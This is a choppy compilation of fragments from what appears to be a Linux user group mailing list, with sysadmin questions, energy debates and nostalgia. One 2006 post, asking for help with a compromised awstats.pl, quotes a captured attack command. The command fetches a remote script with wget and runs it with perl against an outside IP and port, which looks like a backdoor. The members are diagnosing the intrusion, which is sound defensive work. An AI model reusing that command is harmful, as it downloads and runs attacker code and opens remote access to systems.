Well the other possibility is a root kit server? China was mentioned in
the email.
On Jul 1, 2016 15:31, "Zak Elep" wrote:
> On Thu, Jun 30, 2016 at 7:02 PM, Roberto Verzola
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> > Dear pluggers,
> >
> > I managed to get in touch with Louis
28, 2015 at 1:52 AM, Kelsey Hartigan Go
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It is hard to read incomplete sentences. Really.
This debate actually started with a simple thesis. If I wanted to go out
and buy solar panels from a local store and start using it, I can. Even
on a
Sunday.
Can
You can buy solar panels in cdr-king. Where can you buy Thorium in the
Philippines if I want to experiment with it?
By the way do they come with radiation protection? After you bombard it
with neutrons to make it fuel ready, it will be difficult to handle.
In any case I don't think we'll see
and post it in their facebook..
its just a couple of billion of dollars for the development of
thorium...
fooler.
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You can buy solar panels in cdr-king. Where can you buy Thorium in the
Philippines if I
Here are some
Drexx Laggui
Lito averia
Sgv
Kpmg
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Hey guys,
We are looking for someone or a company that can do security audit or
check our servers for security holes.
Anyone knows or interested in applying, please send me an email
To carry voice and install wires (telco) you should have a franchise
granted by Congress and certificate of Public convenience and necessity
from ntc. The congressional franchise should specify what you can do such
as voice only or mega franchise ( everything ) and the location of
service.
On May
On the other hand since this is open source someone is bound to find the
hole. What about proprietary systems?
On Apr 10, 2014 6:37 PM, fooler mail fooler.m...@gmail.com wrote:
pluggers,
another action needed from you... if those sites listed in the link
below that you use their service,
...
their reputation is based not only on the quality of the product but
on the security side as well...
fooler.
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On the other hand since this is open source someone is bound to find the
hole. What about
that there is no such thing as 100% bullet proof
security system... whatever technique you implemented either security
by obscurity or open security...
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It might be believed that big companies have security
Speaking of which, does Eric remember when we started Plug? 1993? It'll be 20
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Yep. Those were the days my friend.
On Wed, Dec 5, 2012 at 3:11 PM, Paolo Falcone pfalc
Didn't know it died.
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Hi,
Maybe offtopic question. Can the government also check/sniff our online bank
account
More like scare tactics? Pay me and I promise I won't sue.
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On Sep 13, 2011, at 1:38 PM, Junix Gaspar junixopho...@gmail.com wrote:
I am more interested as to what patent exactly is being paid to M$
On Tue, Sep 13, 2011 at 5:41 AM, fooler mail fooler.m...@gmail.com
You can't change the eula once you bought it. But if you read the xp home eula,
there's nothing there that prevents you from using it for business or teaching.
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Try M$'s
I did and they said no. But when i told them the eula was silent about it, they
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On May 26, 2011, at 9:38 AM, Danny Ching dlcco...@gmail.com wrote:
Have you contacted MS Philippines? Try asking them.
From,
Danny Ching
Yeah, try working with a spreadsheet, with your hand moving from keyboard to
mouse to keyboard to mouse...
It's easier with the original text based lotus 123 with the / commands...if you
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On Apr 5, 2011, at 6
Ditto with amazon.
Kindle can be bought here but now in sgp or hkg.
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Apple doesn't seem to think we have bad credit. iTunes is restricted (because
of the record labels
Probably deleted a log file but firgot to restart syslog.
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I agree with Jimmy.. 20 Gig is a huge amount of space.. god only knows
what got trashed.
dan
On 02 16, 11, at 10
Speed is relative. You need at least 5 times more spindles to achieve the same
rate as 1 ssd in a san environment. So pricewise and speedwise, ssd is just
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On Jan 18, 2011, at 8:09 PM, Danny Ching
If you can still find ide drives.
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@holden,
Thanks. Flying to Davao sounds very appealing... especially on company's
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@Jijo
I'm actually thinking of doing that. Would IDEs
Don't think it's using ppp. Try converting output to hex to be anle to see the
exchange. Also get hold of the protocol manual.
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Been a while since I posted. Merry Christmas!
I
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Going back to the debate on Daemon (older form of demon), as I recall, the
reason why these are called daemons (or ghosts) as because these processes
are not tied to any PHYSICAL terminal (or body), hence the term ghost or
daemons.
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. And people who buy this
commercial software always do in expectation of getting support.
Because they really need it.
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Now that you posted in the mailing list, you can now find it in google...
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That's DOS...not Windows...B-)
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now try doing all of that in windows...B-)
windows prompt echo DIR /AA /B %SystemRoot%\ls.bat enter
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, Leaves Millions Vulnerable:
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, but I do have those cheap china made
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is just a
keystroke away, it makes no sense to devote more than minimal effort
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Are there any outfits there that develops in LAMP? Is there a directory
somewhere?
Need to outsource some projects...
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in situations where a handgun
would do.
Remember the Unix philosophy of solving a complicated problem
using small tools that do little things, but put together in certain
ways, they are able to solve the most complicated problems?
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Quick question:
need a utility to send a binary file over mail using command line..
I used to use metamail in rhas 2.1..but metamail is no longer available in
rhel4..
shuchs.
need metamail x86_64 version or equivalent...
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more memory, but before that, any
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bytes. So you can only store half the number of
words in the cache. This is why I said the cache is effectively
halved.
You're talking mostly of the code stream...however, when it's data stream
you're talking about, like heavy sorting and the like, 64 bit is going to
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I guess he's referring to some sites like Infocom that requires the entry of
@domain.com when you validate through their pop3 servers. This happened
when they upgraded to Microsoft platform. Prior to that the domain wasn;'t
necessary for login.
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On 8/2/07, Drexx Laggui [personal] [EMAIL PROTECTED] wrote:
02Aug2007 (UTC +8)
Meanwhile, tape for backup is approximately PhP 1,000 per 80GB per
media. That's about PhP 12.5 per 1GB. And it's more readily available.
You forgot to cost our the drive itself.
On 8/3/07, ian sison (mailing list) [EMAIL PROTECTED] wrote:
Yeah? We used to hang out Eric Pareja's Alien's Alcove back then, and
Obet Verzola's Clipper-built Andromeda BBS - and of course, who could
forget the BillBoard BBS in subic where all the good files come from!
I wonder how many old
What version did you upgrade to?...the version I had 3.03 hangs up
regularly...don't know why...maybe the size of the files transferring?
the version 1.01 works forever...never bothered upgrading that.
Just upgraded the version 3 to 4.21.1 -- so far so good...
On 8/5/07, Orlando Andico [EMAIL
First you need to find out why iptables won't work. Or is it because you
can't?
Otherwise you might need to have an external firewall.
TCP wrappers may not work since mysqld listens to the port directly. Running
it through a TCPwrapper, assuming it works, may slow things down. I have a
hunch it
does not have to be a big server. the hd can be smaller if you enable
space saving. and lastly you can replicate on the same server but
different file system
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are you backing up to disk
yep. my thought exactly and that's the reason why i never really got
excited about formalizing PLUG into an organization but rather a loose
set of people helping other people on anything Linux...
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Yap, I hope plug would not fade coz it help me alot.
are you backing up to disk or backing up to tape? if disk, you forgot
the power of linux in replication. just mount another filesystem in
the /local/notesdata and copy all the .nsf files there. and let lotus
notes replicate itself. or if you can set up another server, schedule
a replication
mount -t smbfs -ousername=abc,password=cdf //windowsfileserver/accountname
/media/smbfs
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I have a RH machine that needs to access a windows shared folder on a
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how will i do it? can't find the right the
It simply means that the activation key has not been used in another
computer.
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[image: Thumbs down] *Genuine Windows is Ubuntu*
check /var/log/messages and see if any drives are mounted.
the module simply loads the driver and maps the parallel port to a scsi
device.
then you need to manually mount the drive ... normally /dev/sda1
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Just how far are the TV's scattered?
You can use a PC with a RCA video out and then use video distribution and
amplifiers to bring the NTSC video and audio to where the TV's are using
shielded cables.
If you are using Plasma or LCD TV's you can use specially crafted VGA
cables that can run up
Allow me to join the fray...
I think the discussion here is now really off tangent...
Basically, the FOSS bill is laudable, but I think it should approach the
problem in a different manner.
Define the requirements for purchasing the software application.
Get bids. If someone bids the lowest
I do it the hard way... use fetchmail
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The problem may be the word formatdoc format are being upgraded all the time. Some versions of .doc are not 'openable' with old Open Office. Open office 2.0 has bettern ms .doc compatibility
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A user of Writer shared this problem with me: he
cyrus-imapd -- it's fast though I think it uses some sort of database, over the imap/pop system that came with rh9 -- but yes you're right it is a little bit complicated and you can't use it together with binmail
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#yum install dovecotTo complicate
I've heard of JFFNMS, but haven't really tried it yet...On 10/5/06, Virginia Escobar-Ballerda [EMAIL PROTECTED]
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I'm using cacti (http://www.cacti.nethttp://www.cacti.net) Can anyone recommend an Opensource
Not true. There are some winmodems that are supported...I have this lucent winmodem on my acer and there actually is a linux driver for it.On 9/5/06,
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another way is to do
~rfilename while inside mail
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Hi Plugers,What are the possible reason for our incoming emailbounce back to sender? We are using sendmail as MTA.If I test sending from Yahoo and Gmail and my localaccounts, it was ok. Thanks.
I attest to joomla!...it's a lot easier to set up and configure...On 6/21/06, Erwin Olario [EMAIL PROTECTED]
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Any vulnerability in awstats.pl?I suddenly have these processes running...6086 ? S 0:00 /usr/bin/perl /var/www/cgi-bin/awstats.pl6087 ? R 81:06 sh -c echo ;echo b_exp;wget
http://219.84.105.36/ping.txt;mv ping.txt temp2006;perl temp2006 220.227.100.4 3303;wget http://219.84.105.36/ping;chmod +x
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attack wasn't successful. but me better take a better care for these defaults left open. thanks.
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Subject: Re: [plug] awstats.pl
Author: "Happy Kamote Foundation" [EMAIL PROTECTED]
Date: 08th May 2006 11:42:9
seekuel wrote:
I remebered that the DNS service was up and running before going home.
On the next day when I checked the services named was off and turned
it on. I thought it was kind of weird.
Yep rootkit alright...one of the system got rootkit the same way...
to check -- don't use
seekuel wrote:
I did some digging.
Oh ..I forgot to elaborate -- don't use ps, ls, cat or the more commonly
used..
they get infected or get to infect other programs.
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Actually the new firmware of the stock linksys router now have a setting for AP isolation -- this creates a virtual network for each wireless client and they can't see each other.
On 4/11/06, Orlando Andico [EMAIL PROTECTED] wrote:
this is exactly the same scheme i outlined previously, albeit in
I run white box 4 on a acer pentium iii with 192 mb...seems ok though with gnome.bit swapping needed but performance is better than winxp in 256 mb memory.On 3/29/06,
Jerome Gotangco [EMAIL PROTECTED] wrote:
If you're having an issue with how much memory FF uses, try installingEpiphany instead
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On 3/24/06, Dominique Cimafranca
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Migs: we didn't use Linux back at Digital. It was mostly Digital UNIX and OpenVMS running on the Alpha. Prior to digital unix
On 3/24/06, Dominique Cimafranca [EMAIL PROTECTED] wrote:
Migs: we didn't use Linux back at Digital. It was mostly Digital UNIX and OpenVMS running on the Alpha. Prior to digital unix, there was tru unix, (both for alpha processors) and prior to that was Ultrix (for vax processors)
The first ISP
Oops...I might have been mistaken...Lynx came out in 1995... Other text based browsers includes Links and w3mOn 3/25/06, Kelsey Hartigan Go
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Migs: we didn't use Linux back at Digital. It was mostly Digital UNIX
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